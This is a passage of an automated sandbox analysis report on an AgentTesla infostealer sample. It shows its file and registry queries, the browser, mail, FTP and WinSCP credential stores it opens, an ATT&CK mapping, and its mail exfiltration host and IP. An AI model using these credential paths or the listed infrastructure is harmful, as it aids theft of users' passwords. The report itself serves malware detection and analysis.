              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected AgentTesla
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nrQtAokXKaSn.exe PID: 1008, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: Yara matchFile source: 0000000B.00000002.532293061.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.533369231.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nrQtAokXKaSn.exe PID: 1008, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected AgentTesla
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nrQtAokXKaSn.exe PID: 1008, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts211
              Windows Management Instrumentation              		1
              Scheduled Task/Job              		111
              Process Injection              		1
              Disable or Modify Tools              		2
              OS Credential Dumping              		1
              File and Directory Discovery              		Remote Services11
              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Native API              		Boot or Logon Initialization Scripts1
              Scheduled Task/Job              		1
              Deobfuscate/Decode Files or Information              		11
              Input Capture              		114
              System Information Discovery              		Remote Desktop Protocol2
              Data from Local System              		Exfiltration Over Bluetooth11
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts1
              Scheduled Task/Job              		Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information              		1
              Credentials in Registry              		311
              Security Software Discovery              		SMB/Windows Admin Shares1
              Email Collection              		Automated Exfiltration1
              Non-Standard Port              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)23
              Software Packing              		NTDS1
              Process Discovery              		Distributed Component Object Model11
              Input Capture              		Scheduled Transfer2
              Non-Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets131
              Virtualization/Sandbox Evasion              		SSH1
              Clipboard Data              		Data Transfer Size Limits23
              Application Layer Protocol              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common131
              Virtualization/Sandbox Evasion              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items111
              Process Injection              		DCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              System Network Configuration Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 756116 Sample: SecuriteInfo.com.Win32.Cryp... Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 49 Snort IDS alert for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Sigma detected: Scheduled temp file as task from temp location 2->53 55 9 other signatures 2->55 7 nrQtAokXKaSn.exe 5 2->7         started        10 SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe 6 2->10         started        process3 file4 57 Multi AV Scanner detection for dropped file 7->57 59 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->59 61 May check the online IP address of the machine 7->61 63 Machine Learning detection for dropped file 7->63 13 nrQtAokXKaSn.exe 14 3 7->13         started        17 schtasks.exe 1 7->17         started        19 nrQtAokXKaSn.exe 7->19         started        31 C:\Users\user\AppData\...\nrQtAokXKaSn.exe, PE32 10->31 dropped 33 C:\Users\user\AppData\Local\...\tmp152E.tmp, XML 10->33 dropped 35 SecuriteInfo.com.W....16043.3621.exe.log, ASCII 10->35 dropped 65 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 10->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 10->67 69 Injects a PE file into a foreign processes 10->69 21 SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe 15 3 10->21         started        23 schtasks.exe 1 10->23         started        25 SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe 10->25         started        signatures5 process6 dnsIp7 37 mail.strictfacilityservices.com 13->37 39 3.232.242.170, 443, 49720 AMAZON-AESUS United States 13->39 41 api.ipify.org 13->41 71 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->71 73 Tries to steal Mail credentials (via file / registry access) 13->73 75 Tries to harvest and steal ftp login credentials 13->75 77 Tries to harvest and steal browser information (history, passwords, etc) 13->77 27 conhost.exe 17->27         started        43 strictfacilityservices.com 111.118.212.38, 49717, 49722, 587 PUBLIC-DOMAIN-REGISTRYUS India 21->43 45 mail.strictfacilityservices.com 21->45 47 2 other IPs or domains 21->47 79 Installs a global keyboard hook 21->79 29 conhost.exe 23->29         started        signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe32%ReversingLabsWin32.Trojan.AgentTesla
              SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe32%ReversingLabsWin32.Trojan.AgentTesla

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://www.fontbureau.comdH-u0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/s-P0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/jp/&-c0%Avira URL Cloudsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.carterandcone.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://strictfacilityservices.com0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/Y0010%Avira URL Cloudsafe
              http://www.galapagosdesign.com/staff/dennis.htm/0%Avira URL Cloudsafe
              https://api.ipify.orgmail.strictfacilityservices.comaccounts0%Avira URL Cloudsafe
              http://UrUbMY.com0%Avira URL Cloudsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.fontbureau.comgrita0%URL Reputationsafe
              http://www.fontbureau.comB.TTF0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm20%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/--0%Avira URL Cloudsafe
              http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.fontbureau.comd--0%Avira URL Cloudsafe
